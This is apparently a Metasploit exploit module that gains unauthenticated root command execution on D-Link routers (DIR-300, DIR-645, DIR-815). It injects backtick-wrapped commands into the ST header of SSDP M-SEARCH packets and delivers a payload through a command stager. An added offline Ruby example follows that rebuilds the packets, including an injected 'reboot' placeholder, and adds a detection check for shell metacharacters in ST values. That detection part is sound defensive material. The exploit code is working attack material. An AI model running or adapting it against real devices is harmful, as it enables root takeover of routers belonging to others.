D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection
Source: metasploit.com  Author: Cutlip  Published: 2014-07-14
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
      'Description' => %q{
        Several D-Link routers are vulnerable to OS command injection via UPnP multicast
        (SSDP M-SEARCH) requests: the value of the ST header is passed to a shell unsanitized,
        so a command wrapped in backticks is executed as root. This module has been tested on
        DIR-300 and DIR-645 devices. Zachary Cutlip initially reported the DIR-815 as
        vulnerable. Other devices are probably also affected.
      },
      'Author'      =>
        [
          'Zachary Cutlip', # Vulnerability discovery and initial exploit
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
          ['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
        ],
      'DisclosureDate' => 'Feb 01 2013',
      'Privileged'     => true,
      'Targets' =>
        [
          [ 'MIPS Little Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian', # unknown if there are big endian devices out there
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPS
            }
          ]
        ],
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(1900)
      ], self.class)

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    configure_socket

    pkt =
      "M-SEARCH * HTTP/1.1\r\n" +
      "Host:239.255.255.250:1900\r\n" +
      "ST:upnp:rootdevice\r\n" +
      "Man:\"ssdp:discover\"\r\n" +
      "MX:2\r\n\r\n"

    udp_sock.sendto(pkt, rhost, rport, 0)

    res = nil
    1.upto(5) do
      res,_,_ = udp_sock.recvfrom(65535, 1.0)
      break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
      udp_sock.sendto(pkt, rhost, rport, 0)
    end

    # UPnP response:
    # [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
    # We do not check the device ID (DIR-645) or the firmware version because there are different
    # D-Link devices out there and we do not know all the vulnerable versions. This is only a
    # fingerprint of the D-Link UPnP stack, so the result is Detected rather than Vulnerable.

    if res && res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Unknown
  end

  def execute_command(cmd, opts)
    configure_socket

    pkt =
      "M-SEARCH * HTTP/1.1\r\n" +
      "Host:239.255.255.250:1900\r\n" +
      "ST:uuid:`#{cmd}`\r\n" +
      "Man:\"ssdp:discover\"\r\n" +
      "MX:2\r\n\r\n"

    udp_sock.sendto(pkt, rhost, rport, 0)
  end

  def exploit
    print_status("#{rhost}:#{rport} - Trying to access the device via UPnP ...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to access the vulnerable device")
    end

    print_status("#{rhost}:#{rport} - Exploiting...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 950
    )
  end

  # The packet handling was taken from the module miniupnpd_soap_bof.rb.
  # We need an unconnected socket because SSDP replies often come
  # from a different source port than the one we sent to. This also
  # breaks the standard UDP mixin.
  def configure_socket
    self.udp_sock = Rex::Socket::Udp.create({
      'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
    })
    add_socket(self.udp_sock)
  end

  #
  # Required since we aren't using the normal mixins
  #

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  # Accessor for our UDP socket
  attr_accessor :udp_sock

end
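The module above does two things on the wire: it fingerprints the device by sending a normal SSDP M-SEARCH and matching the SERVER header of the reply, and it delivers the payload by placing a backtick-wrapped command in the ST header. The following Ruby is an added, stand-alone example (not part of the Metasploit module or of Cutlip's original PoC) that builds the same datagrams, parses an SSDP reply the way `check` does, and shows the defender's side: a check over an M-SEARCH datagram that flags shell metacharacters in the ST value. The reply is constructed from the response quoted in the module's comment, and the `reboot` command is a placeholder; nothing is sent on the network.

```ruby
# Added example: SSDP M-SEARCH construction, D-Link fingerprinting, and
# detection of an ST-header command injection. Runs offline on constructed data.

SSDP_MCAST = "239.255.255.250:1900"

# Build an M-SEARCH datagram. `st` is the Search Target header value; the
# module's exploit path passes "uuid:`cmd`" here, the check passes "upnp:rootdevice".
def build_msearch(st, mx: 2)
  "M-SEARCH * HTTP/1.1\r\n" \
  "Host:#{SSDP_MCAST}\r\n" \
  "ST:#{st}\r\n" \
  "Man:\"ssdp:discover\"\r\n" \
  "MX:#{mx}\r\n\r\n"
end

# Parse the header block of an SSDP message into a Hash keyed by lower-cased
# header name. Returns [start_line, headers]. Splitting on the first ":" only
# keeps values such as "http://host:49152/..." intact.
def parse_ssdp(datagram)
  head, _body = datagram.split("\r\n\r\n", 2)
  lines = head.to_s.split("\r\n")
  start_line = lines.shift.to_s
  headers = {}
  lines.each do |line|
    name, value = line.split(":", 2)
    next if name.nil? || value.nil?
    headers[name.strip.downcase] = value.strip
  end
  [start_line, headers]
end

# Same fingerprint the module's check applies: a D-Link reply carries
# "SERVER: Linux, UPnP/1.0, DIR-xxx Ver <version>". A match means "D-Link UPnP
# stack seen", not "vulnerable version confirmed".
DLINK_SERVER_RE = /\ALinux,\s*UPnP\/1\.0,\s*DIR-...\s+Ver/i

def dlink_upnp?(reply)
  _, headers = parse_ssdp(reply)
  server = headers["server"]
  !server.nil? && server.match?(DLINK_SERVER_RE)
end

# Detection side. Legitimate ST values are fixed tokens ("ssdp:all",
# "upnp:rootdevice", "urn:schemas-upnp-org:...", "uuid:<hex-and-dashes>"), so a
# shell metacharacter in ST of an M-SEARCH is a strong injection indicator.
# Returns the offending ST value, or nil if the datagram looks benign.
SHELL_META_RE = /[`$;|&<>()]/

def injected_st(datagram)
  start_line, headers = parse_ssdp(datagram)
  return nil unless start_line.start_with?("M-SEARCH")
  st = headers["st"]
  return nil if st.nil?
  st.match?(SHELL_META_RE) ? st : nil
end

# Constructed sample reply, modelled on the response quoted in the module's comment.
SAMPLE_REPLY =
  "HTTP/1.1 200 OK\r\n" \
  "CACHE-CONTROL: max-age=1800\r\n" \
  "LOCATION: http://192.168.0.2:49152/InternetGatewayDevice.xml\r\n" \
  "SERVER: Linux, UPnP/1.0, DIR-645 Ver 1.03\r\n" \
  "ST: upnp:rootdevice\r\n" \
  "USN: uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n"

if __FILE__ == $0
  puts build_msearch("upnp:rootdevice")
  puts "D-Link UPnP fingerprint: #{dlink_upnp?(SAMPLE_REPLY)}"
  pkt = build_msearch("uuid:`reboot`")   # placeholder command, never sent
  puts "Flagged ST value: #{injected_st(pkt).inspect}"
end
```

The detection regex is deliberately broad: SSDP is a simple token-based protocol, and any of those characters in an ST value has no legitimate use, so false positives on real discovery traffic are unlikely. To turn this into a network rule, apply `injected_st` to UDP/1900 payloads whose first line starts with `M-SEARCH`.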
